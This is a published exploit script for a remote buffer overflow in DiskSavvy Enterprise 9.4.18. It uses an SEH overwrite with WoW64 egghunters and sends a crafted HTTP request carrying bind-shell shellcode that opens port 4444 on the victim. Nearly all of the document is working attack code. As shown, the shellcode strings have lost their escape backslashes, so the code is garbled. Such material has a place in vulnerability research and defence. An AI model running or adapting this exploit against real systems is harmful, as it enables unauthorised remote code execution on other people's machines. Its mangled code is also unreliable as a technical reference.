Disk Savvy Enterprise 9.4.18 Buffer Overflow
Posted on 23 February 2017
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters # Date: 2017-02-22 # Exploit Author: Peter Baris # Vendor Homepage: www.saptech-erp.com.au # Software Link: http://www.disksavvy.com/downloads.html # Version: 9.4.18 # Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64 # WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems # Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit # Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version # If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php import socket import sys try: host = sys.argv[1] os = sys.argv[2] port = 80 except IndexError: print "[+] Usage %s <host> win7/win10" % sys.argv[0] print "[i] Example: dsavvy.py localhost win10" sys.exit() # 355 bytes bind shell, PORT 4444, bad chars x09x0ax0dx20 shell = ("xbax6cxb1x12x02xd9xc7xd9x74x24xf4x5ex33xc9xb1" "x53x83xeexfcx31x56x0ex03x3axbfxf0xf7x3ex57x76" "xf7xbexa8x17x71x5bx99x17xe5x28x8axa7x6dx7cx27" "x43x23x94xbcx21xecx9bx75x8fxcax92x86xbcx2fxb5" "x04xbfx63x15x34x70x76x54x71x6dx7bx04x2axf9x2e" "xb8x5fxb7xf2x33x13x59x73xa0xe4x58x52x77x7ex03" "x74x76x53x3fx3dx60xb0x7axf7x1bx02xf0x06xcdx5a" "xf9xa5x30x53x08xb7x75x54xf3xc2x8fxa6x8exd4x54" "xd4x54x50x4ex7ex1exc2xaax7exf3x95x39x8cxb8xd2" "x65x91x3fx36x1exadxb4xb9xf0x27x8ex9dxd4x6cx54" "xbfx4dxc9x3bxc0x8dxb2xe4x64xc6x5fxf0x14x85x37" "x35x15x35xc8x51x2ex46xfaxfex84xc0xb6x77x03x17" "xb8xadxf3x87x47x4ex04x8ex83x1ax54xb8x22x23x3f" "x38xcaxf6xaax30x6dxa9xc8xbdxcdx19x4dx6dxa6x73" "x42x52xd6x7bx88xfbx7fx86x33x12xdcx0fxd5x7excc" "x59x4dx16x2exbex46x81x51x94xfex25x19xfex39x4a" "x9axd4x6dxdcx11x3bxaaxfdx25x16x9ax6axb1xecx4b" "xd9x23xf0x41x89xc0x63x0ex49x8ex9fx99x1exc7x6e" "xd0xcaxf5xc9x4axe8x07x8fxb5xa8xd3x6cx3bx31x91" "xc9x1fx21x6fxd1x1bx15x3fx84xf5xc3xf9x7exb4xbd" "x53x2cx1ex29x25x1exa1x2fx2ax4bx57xcfx9bx22x2e" "xf0x14xa3xa6x89x48x53x48x40xc9x63x03xc8x78xec" "xcax99x38x71xedx74x7ex8cx6ex7cxffx6bx6exf5xfa" "x30x28xe6x76x28xddx08x24x49xf4") crash = "x41" * 2487 retn = "x38x2ex14x10" # 0x10142e38 pop edi pop esi ret filler = "x44" * (2505-334-300-100) nseh = "xebx08x90x90" stack_fill="x41"*100 nops="x90"*8 egg = "t00wt00w" if os == "win7": wow64_egghunter = ("x66x8cxcbx80xfbx23x75x08x31xdbx53x53x53x53xb3xc0" "x33xd2" "x66x81xcaxffx0fx42x52x80xfbxc0x74x19x6ax02x58xcd" "x2ex5ax3cx05x74xefxb8" "x74x30x30x77" "x89xd7xafx75xe5xafx75xe2xffxe7x6ax26x58x31xc9x89" "xe2x64xffx13x5ex5axebxdf") elif os == "win10": wow64_egghunter = ("x66x8cxcbx80xfbx23x75x10x31xd2x66x81xcaxffx0fx31" "xdbx42x52x53x53x53xb3xc0x80xfbxc0x74x13x3cx05x74xeexb8" "x74x30x30x77" "x89xd7xafx75xe4xafx75xe1xffxe7" "x6ax29x58x64xffx13x83xc4x0cx5axebxe1") else: print "[!] This windows version is not supported yet" exit(0) exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler buffer = "GET /"+exploit+" HTTP/1.1 " buffer+= "Host: "+host+" " buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2 " buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " buffer+="Accept-Language: en-US,en;q=0.5 " buffer+="Accept-Encoding: gzip, deflate " buffer+="Referer: http://"+host+"/login " buffer+="Connection: keep-alive " buffer+="Content-Type: application/x-www-form-urlencoded " buffer+="Content-Length: 5900 " s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) s.send(buffer) s.close()